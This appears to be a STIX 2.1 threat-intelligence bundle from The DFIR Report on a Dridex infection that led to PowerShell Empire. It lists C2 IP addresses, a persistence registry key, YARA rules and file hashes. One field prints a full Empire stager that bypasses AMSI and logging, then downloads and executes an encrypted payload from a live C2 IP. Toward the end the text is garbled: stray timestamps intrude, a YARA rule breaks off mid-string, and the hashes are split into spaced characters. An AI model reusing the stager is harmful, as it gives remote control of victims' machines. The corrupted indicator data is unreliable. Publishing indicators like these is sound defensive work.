2023-04-21 14:44:17 +00:00
{
"type" : "bundle" ,
"id" : "bundle--946e7701-5bdd-4efe-ae94-a6626fc8092b" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T20:04:33.000Z" ,
"modified" : "2020-08-03T20:04:33.000Z" ,
"name" : "The DFIR Report" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--946e7701-5bdd-4efe-ae94-a6626fc8092b" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T20:04:33.000Z" ,
"modified" : "2020-08-03T20:04:33.000Z" ,
"name" : "Dridex to Empire" ,
"published" : "2020-08-03T20:05:47Z" ,
"object_refs" : [
"x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541" ,
"indicator--39f56fa9-58f9-4962-a4e9-809182990f7d" ,
"indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af" ,
"indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268" ,
"indicator--ef331607-0a3d-4770-b9da-33708b3e1a10" ,
"indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3" ,
"indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0" ,
"indicator--587aa626-f57e-444e-b1c1-ab3491f99a10" ,
"indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2" ,
"indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1" ,
"indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4" ,
"indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6" ,
"indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92" ,
"indicator--c176ce15-acd2-4573-9991-8e19d4953c4f" ,
"indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30" ,
"indicator--931290f5-12fd-493e-802f-4e9e132a6a0d" ,
"indicator--80882b5d-a04b-4963-a324-e9778acbaec6" ,
"indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3" ,
"indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6" ,
"observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d" ,
"url--5938cc58-c427-4a29-808b-fcdfcd62ff7d" ,
"indicator--be484895-ebf6-4a2d-b492-e8810cd8f793" ,
"indicator--46037d3e-727a-4508-8dcb-d10de58a764f" ,
"indicator--612fb261-eeee-4173-a89d-074aad7c64d2" ,
"indicator--513494bf-37dd-4704-a5ea-15155c29c4fc" ,
"indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69" ,
"indicator--7b2b9772-9059-4651-84e8-bc066e15b917" ,
"indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2" ,
"indicator--9bb216ae-af15-4cba-9d65-40be296d9438" ,
"indicator--aec61910-1c29-47c5-88c9-37621ded62dd" ,
"indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7" ,
"indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2" ,
"x-misp-object--0537282b-b524-441b-bc04-7b894b342a40" ,
"x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6" ,
"x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239" ,
"x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786" ,
"x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff" ,
"x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31" ,
"x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867" ,
"x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251" ,
"x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2" ,
"x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f" ,
"x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c" ,
"x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1" ,
"x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0" ,
"x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218" ,
"x-misp-object--072b4d8e-b602-458e-9a96-71242a752828"
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"Dridex" ,
"Powershell Empire" ,
"misp-galaxy:tool=\"Dridex\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T19:55:43.000Z" ,
"modified" : "2020-07-15T19:55:43.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "If($PSVERSiOnTaBlE.PSVERsIOn.MajOr -Ge 3){$GPF=[reF].AsseMbLy.GETTYpe('System.Management.Automation.Utils').\"GETFiE`ld\"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtVaLuE($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[CoLLECtIONS.GeneRIC.DiCtIONArY[strING,SyStem.ObJeCT]]::nEW();$VAl.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScrIpTBlock].\"GetFIe`ld\"('signatures','N'+'onPublic,Static').SETValUE($NUll,(NEw-ObJect COLlecTiONs.GEneRic.HASHSet[sTrInG]))}[Ref].AsSEMbLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIelD('amsiInitFailed','NonPublic,Static').SETVAlue($null,$TRUe)};};[SYsTEM.NET.SerVIcEPoIntMaNAger]::ExPECt100CONTinuE=0;$Wc=New-ObJecT SYSTem.NET.WeBClIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeAdERs.ADD('User-Agent',$u);$WC.PrOXY=[SYsTEm.NET.WebREQuEst]::DeFaULTWeBProxY;$WC.PROxy.CrEDENtiAls = [SYSTeM.NeT.CREDENTIALCaChe]::DeFAULTNetWORkCREdenTialS;$Script:Proxy = $wc.Proxy;$K=[SYstEm.TExT.ENCOdiNG]::ASCII.GeTBYTES('b6dc9515bf3161700de268130726d162');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOR$S[($S[$I]+$S[$H])%256]}};$ser='https://194.99.22.145:443';$t='/login/process.php';$wC.HeADerS.ADD(\"Cookie\",\"session=TI47O5rucSxxojlrBjwysXKBrRQ=\");$DATA=$WC.DOWnLOADDatA($seR+$t);$iV=$daTA[0..3];$DATa=$daTA[4..$DaTA.LenGTh];-join[Char[]](& $R $DAta ($IV+$K))|IEX"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--39f56fa9-58f9-4962-a4e9-809182990f7d" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:32:15.000Z" ,
"modified" : "2020-07-15T20:32:15.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '194.99.22.145']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:32:15Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"kill-chain:Command and Control" ,
"Powershell Empire"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:31:54.000Z" ,
"modified" : "2020-07-15T20:31:54.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '64.118.8.15']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:31:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:31:49.000Z" ,
"modified" : "2020-07-15T20:31:49.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '59.148.253.194']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:31:49Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--ef331607-0a3d-4770-b9da-33708b3e1a10" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-21T02:21:32.000Z" ,
"modified" : "2020-07-21T02:21:32.000Z" ,
"pattern" : "[windows-registry-key:key = '\\\\HKEY_USERS\\\\S-1-5-21-1761595937-4212512506-1431507687-12106\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Zvhlxdonjwfvei']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-21T02:21:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Persistence mechanism"
}
] ,
"labels" : [
"misp:type=\"regkey\"" ,
"misp:category=\"Persistence mechanism\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-21T02:22:45.000Z" ,
"modified" : "2020-07-21T02:22:45.000Z" ,
"pattern" : "[file:name = '\\\\%APPDATA\\\\%\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\swET\\\\bdechangepin.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-21T02:22:45Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload installation"
}
] ,
"labels" : [
"misp:type=\"filename\"" ,
"misp:category=\"Payload installation\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:22.000Z" ,
"modified" : "2020-08-03T01:22:22.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.58.16.87']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:22Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--587aa626-f57e-444e-b1c1-ab3491f99a10" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:22.000Z" ,
"modified" : "2020-08-03T01:22:22.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.168.239.42']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:22Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:21.000Z" ,
"modified" : "2020-08-03T01:22:21.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '216.52.109.40']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:21.000Z" ,
"modified" : "2020-08-03T01:22:21.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.221.43']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:21.000Z" ,
"modified" : "2020-08-03T01:22:21.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '104.131.103.128']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:20.000Z" ,
"modified" : "2020-08-03T01:22:20.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '54.39.34.24']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:20.000Z" ,
"modified" : "2020-08-03T01:22:20.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '192.99.103.228']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--c176ce15-acd2-4573-9991-8e19d4953c4f" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:20.000Z" ,
"modified" : "2020-08-03T01:22:20.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.80.178.251']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:20:19.000Z" ,
"modified" : "2020-08-03T01:20:19.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '75.170.61.45']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:20:19Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--931290f5-12fd-493e-802f-4e9e132a6a0d" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T10:20:57.000Z" ,
"modified" : "2020-08-03T10:20:57.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '199.66.90.63']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T10:20:57Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--80882b5d-a04b-4963-a324-e9778acbaec6" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T10:20:34.000Z" ,
"modified" : "2020-08-03T10:20:34.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.223.244']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T10:20:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T10:20:09.000Z" ,
"modified" : "2020-08-03T10:20:09.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '209.74.126.2']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T10:20:09Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T20:04:33.000Z" ,
"modified" : "2020-08-03T20:04:33.000Z" ,
"pattern" : "[/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2020-07-29\r\n Identifier: dridex-yara\r\n Reference: https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\n*/\r\n\r\n/* Rule Set ----------------------------------------------------------------- */\r\n\r\nimport \"pe\"\r\n\r\nrule dridex_yara_ufo {\r\n meta:\r\n description = \"dridex-yara - file ufo.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"usersJRB\" fullword wide\r\n $s5 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s6 = \"2017,2uchannelsPYDudays\" fullword wide\r\n $s7 = \"torrespondedthanfshadow\" fullword wide\r\n $s8 = \"increasing.includeda7iexample,Hofgodzilla\" fullword wide\r\n $s9 = \"haveand2system-providedreleasenoneJgZtest,\" fullword wide\r\n $s10 = \"wsupport3voftenfromR\" fullword wide\r\n $s11 = \"tofwerentheFirefox.149simplerunstableqqinformation\" fullword wide\r\n $s12 = \"11.172.2.11\" fullword wide\r\n $s13 = \"Dinsettheir\" fullword wide\r\n $s14 = \"yofthe\" fullword wide\r\n $s15 = \"TLty2_J \" fullword ascii\r\n $s16 = \"CosZTX^&% \" fullword ascii\r\n $s17 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s18 = \"4vthethatfour-part\" fullword wide\r\n $s19 = \"GkaChrome\" fullword wide\r\n $s20 = \"L$<;D$<\" fullword ascii /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"e37c1c1a736faeeff7de27f075619f47\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_cannot_but_soft {\r\n meta:\r\n description = \"dridex-yara - file cannot_but_soft.xsl\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6\"\r\n strings:\r\n $s1 = \"var a_couch_for = [\\\"love_is_by\\\",\\\"all_but_keep\\\",\\\"summons_i_th\\\",\\\"humanity_so_we\\\",\\\"thus_hath_fed\\\",\\\"and_stood_between\\\",\" wide\r\n $s2 = \"{var and_light_than = [\\\"tween_their_course\\\",\\\"ophelia_distracted\\\",\\\"marriage_and_both\\\",\\\"of_us_grant\\\",\\\"nor_eye_and\\\",\\\"hum\" wide\r\n $s3 = \"xmlns=\\\"http://www.w3.org/1999/XSL/Transform\\\" xmlns:ms=\\\"urn:schemas-microsoft-com:xslt\\\" \" fullword wide\r\n $s4 = \"while (among_a_father + then_this_be >= new Date().getTime()) {}}\" fullword wide\r\n $s5 = \"<ms:script implements-prefix=\\\"user\\\" language=\\\"JScript\\\">\" fullword wide\r\n $s6 = \"]]> </ms:script>\" fullword wide\r\n $s7 = \"</ms:script>\" fullword wide\r\n $s8 = \"{var among_a_father = new Date().getTime();\" fullword wide\r\n $s9 = \"it_so_mope(\\\"rundll32 \\\".concat(locks_to_all.concat(\\\" \\\".concat(\\\"DllRegisterServer\\\"))))\" fullword wide\r\n $s10 = \"xmlns:user=\\\"placeholder\\\" \" fullword wide\r\n $s11 = \"var locks_to_all = \\\"%WINDIR%\\Temp/\\\".concat(\\\"/\\\".concat(my_acquittance))\" fullword wide\r\n $s12 = \"{return leaves_in_his.readystate}\" fullword wide\r\n $s13 = \"function unproportion_d_no(leaves_in_his)\" fullword wide\r\n $s14 = \"run(for_s_purpose)}}\" fullword wide\r\n $s15 = \"version=\\\"1.0\\\">\" fullword wide\r\n $s16 = \"if(beast_so_as(call_it_an)=== 150+50 && unproportion_d_no(call_it_an) === 1+3)\" fullword wide\r\n $s17 = \"var lecture_and_polonius = \\\"wscript.\\\".concat(first_corse_again);\" fullword wide\r\n $s18 = \"with (now_it_profanely){\" f u l l w o r d w i d e
"pattern_type" : "yara" ,
2023-12-14 14:30:15 +00:00
"pattern_version" : "2.1" ,
2023-04-21 14:44:17 +00:00
"valid_from" : "2020-08-03T20:04:33Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"yara\"" ,
"misp:category=\"Artifacts dropped\""
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T12:30:56.000Z" ,
"modified" : "2020-08-03T12:30:56.000Z" ,
"first_observed" : "2020-08-03T12:30:56Z" ,
"last_observed" : "2020-08-03T12:30:56Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--5938cc58-c427-4a29-808b-fcdfcd62ff7d"
] ,
"labels" : [
"misp:type=\"link\"" ,
"misp:category=\"External analysis\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--5938cc58-c427-4a29-808b-fcdfcd62ff7d" ,
"value" : "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--be484895-ebf6-4a2d-b492-e8810cd8f793" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:09:07.000Z" ,
"modified" : "2020-07-15T20:09:07.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 92 c c 8 b 22 a 89 c c 560963407 b 482443 b 76 ' A N D f i l e : h a s h e s . S H A 1 = ' 8 b 0 c 0 b 84222571 a 70 c a 65 c 0e3 e 8 c f 459 c 80406 f c ' A N D f i l e : h a s h e s . S H A 256 = ' 5761 f d 8 b 454 c 1121 f 80019 a d e 53 b 0 815 b d 0 573 d a c 89 f e 6 e c d 3198e7 d 756 f 1 a 3 a ' A N D f i l e : h a s h e s . S H A 512 = ' 2246 f 494 a 57 b 0 c b 1623 c 7 e b 0 c 7 d c 11 c a 8424 a d 166 c 99 c f 87 c 7528e425167297266 c f 7 f e 56 d 342756560 d 4e5 d e 9 b 1 a b 2 d 989527 b 0 581 b 79 e d f 910519 c b b 973475 ' A N D f i l e : h a s h e s . S S D E E P = ' 3072 : t o A D c j L 2 k 0 J Y G 5 g B x U h 54 M s 7 l + w 87 E S g N t Y 8 p E S e n x x g S r Y G R Q J S w r r u P K : q A 26 h B 5 g B Z 74 X Q N 99 e n x x g S h R W 6 i ' A N D f i l e : n a m e = ' u f o . e x e ' A N D f i l e : s i z e = ' 217088 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A 